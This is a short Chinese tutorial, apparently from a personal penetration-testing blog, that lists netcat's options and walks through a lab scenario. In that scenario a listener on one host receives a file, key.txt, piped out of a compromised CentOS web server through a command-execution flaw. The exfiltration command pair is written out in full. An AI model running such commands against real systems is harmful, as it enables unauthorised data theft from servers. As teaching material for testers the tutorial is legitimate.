NC利用
目录
- 基本命令
- 利用场景
基本命令
NC就是netcat,渗透测试中被称为瑞士军刀,它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能;
语法:NC [参数]
-g<网关>:设置路由器跃程通信网关,最多设置8个;
-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
-h:在线帮助;
-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
-l:使用监听模式,监控传入的资料;
-n:直接使用ip地址,而不通过域名服务器;
-o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p<通信端口>:设置本地主机使用的通信端口;
-r:指定源端口和目的端口都进行随机的选择;
-s<来源位址>:设置本地主机送出数据包的IP地址;
-u:使用UDP传输协议;
-v:显示指令执行过程;
-w<超时秒数>:设置等待连线的时间;
-z:使用0输入/输出模式,只在扫描通信端口时使用。
利用场景
终端A(centos):192.168.242.131
终端B(windows):192.168.0.103
场景:如果A上部署了web服务,存在命令执行的情况,那么可以使用NC监听A上的内容。
例如A终端/var目录下有一个key.txt
a.在windows的B终端监听端口888,使用nc.exe -lvvvp 888,完成监听
b.在centos终端传输文件内容到B终端,使用nc 192.168.0.103 888 < key.txt
c.这个时候可以在B中打印key.txt的文件内容
我的博客:https://www.cnblogs.com/loopkep